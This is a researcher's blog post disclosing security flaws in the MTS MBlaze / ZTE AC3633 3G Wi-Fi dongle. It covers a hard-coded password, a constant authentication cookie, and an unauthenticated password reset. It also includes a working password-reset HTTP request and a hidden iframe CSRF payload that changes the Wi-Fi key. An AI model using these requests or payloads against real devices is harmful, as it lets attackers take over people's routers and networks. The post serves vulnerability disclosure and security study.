Multiple Security issues were identified on MTS MBlaze USB Dongle. The post covers how I combined couple of web security issues like Authentication Bypass, Un-authenticated Password Reset, CSRF, IDOR, etc. to develop an exploit for MTS Dongle.
Recently I bought a MTS MBlaze 3G Plus Wi-Fi USB Modem. I picked it because, it got pretty good tariff plans & speed compared to other providers in my area. The interesting thing is that, it allowed up to 5 devices to connect to it via Wi-Fi. So it appears to me as a fast, cheap and portable broadband alternative. This device is manufactured by ZTE, a Chinese multinational telecommunications equipment and systems company.
MBlaze has two way of operation
After some digging outs, it was found that the passwords are hard coded in the source code. The router web interface password is hard coded in the password reset page.
The worst thing was that the session maintaining cookie used by the router web interface is static. This Cookie (iusername=logined) is all you need to get an authenticated session. As this session cookie is constant all the times, simply setting the cookie will give access to protected pages in the web interface. Another issue I found was, that you can reset the router web interface password without knowing old password. You don’t even need the session cookie for password resetting. The following request is a PoC to reset the password without knowing the old password and with an unauthenticated session. This will be considered under OWASP Top 10- A4, Insecure Direct Object Reference.
Most of the forms in the Router web interface lacks CSRF tokens which essentially make them vulnerable to Cross Site Request Forgery. Putting it all together, I made a quick dirty python POC exploit for MTS MBlaze Ultra Wi-Fi / ZTE AC3633 that can do the following things.
POST /goform/formSyWebCfg HTTP/1.1 Host: 192.168.1.1 Content-Type: application/x-www-form-urlencoded Referer: http://192.168.1.1/en/password.asp Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8,es;q=0.6,ms;q=0.4 Content-Length: 52 action=Apply&sys_cfg=changed&sys_password=newpass
Now the Wi-Fi Key is changed to xboz. From this point, the attacker can connect to the Wi-Fi network and execute the exploit to gain access to the MTS device.
<iframe src="http://192.168.1.1/goform/formSyWebCfg?wl_encryption_protocol=3&wl_wpa_psk_mode=0&wl_wpa_psk_key=xboz&wl_auth_mode=0&oem_cfg=changed&action=Apply" width="0" height="0">
Ajin Abraham is a Security Engineer with 7+ years of experience in Application Security including 4 years of Security Research. He is passionate on developing new and unique security tools. Some of his contributions to Hacker's arsenal include OWASP Xenotix XSS Exploit Framework, Mobile Security Framework (MobSF), Xenotix xBOT, NodeJsScan etc to name a few. He has been invited to speak at multiple security conferences including ClubHack, Nullcon, OWASP AppSec Eu, OWASP AppSec AsiaPac, BlackHat Europe, Hackmiami, Confidence, BlackHat US, BlackHat Asia, ToorCon, Ground Zero Summit, Hack In Paris, Hack In the Box, c0c0n and PHDays.